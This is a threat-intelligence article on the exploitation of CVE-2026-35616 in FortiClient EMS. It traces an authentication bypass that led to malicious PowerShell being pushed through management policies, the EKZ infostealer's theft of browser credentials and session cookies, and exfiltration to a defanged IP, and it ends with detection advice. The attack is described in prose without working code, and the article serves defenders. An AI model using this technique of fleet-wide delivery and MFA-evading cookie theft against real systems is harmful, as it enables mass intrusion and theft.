Enterprise endpoint management platforms exist to give security and IT teams centralized control over every managed device in the organization. The implicit trust that makes these platforms operationally powerful — the ability to push configurations, execute scripts, and deploy software across thousands of endpoints simultaneously — is precisely what makes them catastrophic when compromised. The active exploitation of CVE-2026-35616 in Fortinet’s FortiClient Endpoint Management Server, documented by Arctic Wolf in May 2026, demonstrates what that catastrophic scenario looks like in production: an attacker who bypasses API authentication on a single EMS server gains a management pathway to every endpoint the platform governs, without requiring a separate intrusion into each device.
This is not a vulnerability that allows an attacker to compromise one machine. It is a vulnerability that allows an attacker to compromise one management server and inherit its authority over the entire managed fleet.
How the Attack Chain Weaponized FortiClient’s Own Infrastructure
CVE-2026-35616 is a pre-authentication API access bypass in FortiClient EMS carrying a CVSS score of 9.1. The vulnerability allows unauthenticated access to privileged API functionality, enabling attackers to modify management configurations and endpoint policies without valid credentials. Fortinet patched the issue in FortiClient EMS 7.4.7, but organizations running unpatched versions remained exposed to an attack chain that Arctic Wolf observed being actively exploited in May 2026.
Following successful authentication bypass, the threat actors modified Remote Access Profile configurations and endpoint policies to insert malicious PowerShell scripts for execution across managed endpoints. The execution pattern, as Arctic Wolf characterized it, resembled legitimate management operations — because it was using legitimate management operations. The attacker wasn’t injecting code through a novel execution pathway. They were using FortiClient’s own management infrastructure to push commands to endpoints in the same manner that authorized administrators use it daily.
The payload delivery mechanism reinforced that legitimacy signal at every layer. A legitimate FortiClient executable, fortitray.exe, was leveraged to launch a .cmd script through cmd.exe. The .cmd script invoked a Base64-encoded PowerShell command that downloaded the malicious payload, executed it, and exfiltrated results to attacker-controlled infrastructure. The malicious executable itself was named FortiEndpoint_Patch.exe — designed to appear as a routine Fortinet endpoint update to any employee or security tool that observed it running.
The EKZ Infostealer and Its Post-Compromise Access Implications
The payload delivered through this campaign is a previously undocumented Windows information stealer targeting Chromium and Gecko-based browsers. Named EKZ infostealer by Arctic Wolf, it harvests passwords, session cookies, autofill data including credit card information, addresses, and phone numbers from browser credential stores. The harvested data is written to a log file in the ProgramData directory. Exfiltration is handled by the PowerShell script component rather than the stealer itself, transmitting the captured data to 83.138.53[.]110 via HTTP POST.
The session cookie harvesting capability is the element that carries the most significant downstream access implications. Session cookies from authenticated browser sessions represent valid, active access to cloud services, SaaS applications, internal web applications, and any other service where the browser maintains an authenticated session. Unlike password harvesting — which requires the attacker to authenticate with stolen credentials and may trigger MFA challenges — session cookie reuse presents an already-authenticated session to target services. MFA protections that are correctly configured to challenge new authentication events provide no defense against an attacker presenting a valid existing session token.
Arctic Wolf’s explicit note that session reuse may circumvent MFA prompts is the detail that should drive the urgency of incident response for organizations that ran vulnerable FortiClient EMS versions. An organization that patches the EMS vulnerability and rotates administrative credentials has addressed the access vector but may still have active attacker sessions persisting across cloud and SaaS infrastructure from cookies harvested before remediation.
One Compromised Management Server, Fleet-Wide Execution Reach
The architectural implication of this attack chain deserves direct articulation for executive and board-level security conversations. Modern endpoint management platforms — FortiClient EMS, Microsoft Intune, CrowdStrike Falcon, and their equivalents — are designed to provide centralized, authenticated control over every managed endpoint. That centralization is a security feature: it enables consistent policy enforcement, rapid patch deployment, and coordinated incident response. It also creates a high-value single point of compromise where control of the management plane translates directly into control of the managed fleet.
Arctic Wolf’s characterization of the exploitation impact is precise: once the attacker had a route to modify EMS-managed configuration, every managed endpoint became a potential execution target without requiring a separate intrusion path to each device. An organization with 10,000 managed endpoints running FortiClient effectively had 10,000 potential malware delivery targets accessible through a single compromised server. The attacker’s effort to compromise those endpoints individually — each requiring its own access vector, its own detection evasion, its own persistence establishment — was entirely bypassed by controlling the management infrastructure.
This is the threat model that security architects building endpoint management programs need to incorporate into their risk assessments. The management plane is not just administrative infrastructure. It is an amplification platform for any attacker who reaches it, and its security posture needs to reflect that amplification capability in how authentication, network access, and privilege boundaries are designed.
Detection Gaps That This Campaign Specifically Exploited
The campaign’s use of legitimate FortiClient executables, standard management operations, and a payload named to resemble an authorized update creates specific detection challenges that security operations teams should explicitly address in their detection engineering programs.
Process execution monitoring that trusts fortitray.exe as a known-good FortiClient component without scrutinizing its child process behavior will miss the .cmd script launch that initiates the credential theft chain. Behavioral detection logic needs to flag unexpected child process creation from endpoint security tool executables — not just known-malicious binaries launching malicious children, but trusted security binaries launching scripting interpreters or command shells in unexpected contexts.
The Base64-encoded PowerShell execution pattern is a well-documented indicator that most EDR platforms monitor, but the encoding within a legitimate management operation context may produce lower-confidence detections than the same pattern in an obviously malicious context. Tuning PowerShell script block logging and AMSI inspection to capture and analyze encoded execution regardless of the parent process origin is the configuration adjustment that closes this gap.
Network-level, HTTP POST connections to 83.138.53[.]110 from endpoints during the active campaign window represent the exfiltration indicator that network detection tools are positioned to catch even when endpoint behavioral detection misses the execution chain.
The Broader Pattern: Security Vendor Infrastructure as an Attack Target
FortiClient EMS exploitation sits within the pattern that has been building throughout 2026: attackers deliberately targeting security and management infrastructure because compromise of those platforms provides disproportionate access to everything beneath them. Cisco Secure Workload, Trend Micro Apex One, and now FortiClient EMS have all appeared in active exploitation news within weeks of each other — each representing a security platform whose compromise provides privileged access to the enterprise environments it was deployed to protect.
For CISOs conducting platform risk reviews, the consistent targeting of security management infrastructure is the signal that should be driving investment in management plane isolation, privileged access workstation architectures for security tool administration, and anomaly detection specifically covering unexpected configuration changes in endpoint management platforms. The security tool itself has become the attack surface. Defending it requires the same rigor applied to the infrastructure it governs.
Research and Intelligence Sources: kudelskisecurit
To participate in our interviews, please write to our CyberTech Media Room at info@intentamplify.com
